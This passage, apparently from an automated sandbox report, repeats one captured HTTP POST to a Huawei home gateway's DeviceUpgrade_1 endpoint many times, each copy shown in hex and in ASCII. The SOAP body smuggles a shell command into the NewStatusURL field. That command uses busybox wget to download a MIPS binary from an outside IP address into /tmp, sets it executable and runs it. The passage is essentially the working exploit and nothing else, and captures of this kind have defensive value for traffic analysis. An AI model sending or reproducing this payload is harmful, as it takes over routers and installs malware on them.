68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
